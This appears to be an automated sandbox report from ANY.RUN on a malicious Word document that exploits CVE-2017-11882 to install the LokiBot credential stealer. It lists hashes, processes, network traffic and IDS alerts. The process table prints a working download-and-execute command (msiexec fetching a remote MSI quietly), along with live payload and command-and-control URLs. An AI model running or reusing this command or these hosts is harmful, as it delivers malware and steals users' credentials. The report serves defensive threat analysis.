analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

aee74807df9fa1312f400f28f6e2af9e.doc

Full analysis: https://app.any.run/tasks/f92e0152-cffb-447d-95fd-9a88eb4d86cb
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 18, 2019, 23:13:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
loader
exe-to-msi
trojan
lokibot
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

AEE74807DF9FA1312F400F28F6E2AF9E

SHA1:

8600580EA851024E5060D133596B67C9161AF13C

SHA256:

993ACA30290295FEE5B4DA2C7973DCA6347DEE2CB24A6E1B161CDE0B809A996B

SSDEEP:

3072:J7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKCwP:J7lCAdFkYhDFBxvqyRmTMSFmfSs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3960)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2608)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2148)
    • Detected artifacts of LokiBot

      • MSIFB12.tmp (PID: 1328)
    • LOKIBOT was detected

      • MSIFB12.tmp (PID: 1328)
    • Actions looks like stealing of personal data

      • MSIFB12.tmp (PID: 1328)
    • Connects to CnC server

      • MSIFB12.tmp (PID: 1328)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3960)
    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2704)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2148)
      • MSIFB12.tmp (PID: 1328)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2148)
    • Loads DLL from Mozilla Firefox

      • MSIFB12.tmp (PID: 1328)
    • Reads Internet Cache Settings

      • MSIFB12.tmp (PID: 1328)
    • Creates files in the user directory

      • MSIFB12.tmp (PID: 1328)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2704)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2704)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3960)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2148)
      • MSIFB12.tmp (PID: 2584)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2148)
    • Application was dropped or rewritten from another process

      • MSIFB12.tmp (PID: 2584)
      • MSIFB12.tmp (PID: 1328)
    • Application launched itself

      • MSIFB12.tmp (PID: 2584)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2ea8411c
ZipCompressedSize: 351
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2019:02:17 21:39:00Z
ModifyDate: 2019:02:17 21:39:00Z

XMP

Title: -
Subject: -
Creator: Windows User
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msifb12.tmp no specs #LOKIBOT msifb12.tmp

Process information

PID
CMD
Path
Indicators
Parent process
2704"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\aee74807df9fa1312f400f28f6e2af9e.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3960"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2608cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3124msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2148C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2916"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2584"C:\Windows\Installer\MSIFB12.tmp"C:\Windows\Installer\MSIFB12.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1328"C:\Windows\Installer\MSIFB12.tmp"C:\Windows\Installer\MSIFB12.tmp
MSIFB12.tmp
User:
admin
Integrity Level:
MEDIUM
Total events
1 370
Read events
1 176
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
26
Text files
16
Unknown types
7

Dropped files

PID
Process
Filename
Type
2704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9234.tmp.cvr
MD5:
SHA256:
2704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{188F40E1-4EC1-4D89-98AC-C4FC177651A6}
MD5:
SHA256:
2704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{C65CABA2-92D8-4833-AE93-85BD15B655D7}
MD5:
SHA256:
2704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6333895.jpeg
MD5:
SHA256:
2704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$e74807df9fa1312f400f28f6e2af9e.docpgc
MD5:202E1927086C32429A52A9EF3424318F
SHA256:EEA4570034A01E886FC85F8B32FC3CED88464CEF9F586F6DAC627B63D56AF44F
2704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:C8969FDECC27C1E27A48ACF556C5E513
SHA256:BD8DEBF28165F8F719451D15692820393C76BD64B6E859D791A7526C76B5289E
2704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:B5121B0DFAE0084D024E25E8941A9D47
SHA256:AC29D2FE62547C41F3BE29ED2B44622CB154CA84F862230573AEDF6FB57EE8CE
2704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:64E99FA4C41918116A641FBD6D2D3851
SHA256:F26DDC7DD844396323EDC73E0A351F14A03B76502FFE4D8805F6A32307B095C7
2704WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B2A436A8C3D1FBC4316A1C780A4B85BD
SHA256:831EF4D2D350750F189D949F20BEEC0307F8F611932193B5D366BC53366AB189
2704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{DC3E8092-7D9E-4C17-9020-F7B9D867EEEC}.FSDbinary
MD5:3C18D7BF95F7C9ADB54A8C696C7503D7
SHA256:D6ABFE4D5FA8CB3150B331C0000D773F36BA9DA23BD8F8D8AB097C009B1802C6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
12
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2704
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2704
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
2148
msiexec.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/baba.msi
VN
executable
656 Kb
suspicious
976
svchost.exe
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css
VN
html
230 b
suspicious
2704
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
compressed
56.4 Kb
suspicious
2704
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
1328
MSIFB12.tmp
POST
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
malicious
1328
MSIFB12.tmp
POST
200
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
binary
23 b
malicious
1328
MSIFB12.tmp
POST
200
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
binary
23 b
malicious
1328
MSIFB12.tmp
POST
200
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
binary
23 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1328
MSIFB12.tmp
185.159.153.76:80
irubix.ir
Fanavari Serverpars Argham Gostar Company Ltd.
IR
malicious
2704
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
976
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2148
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious

DNS requests

Domain
IP
Reputation
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious
irubix.ir
  • 185.159.153.76
malicious

Threats

PID
Process
Class
Message
2148
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2148
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2148
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1328
MSIFB12.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1328
MSIFB12.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
1328
MSIFB12.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1328
MSIFB12.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1328
MSIFB12.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
1328
MSIFB12.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1328
MSIFB12.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
8 ETPRO signatures available at the full report
No debug info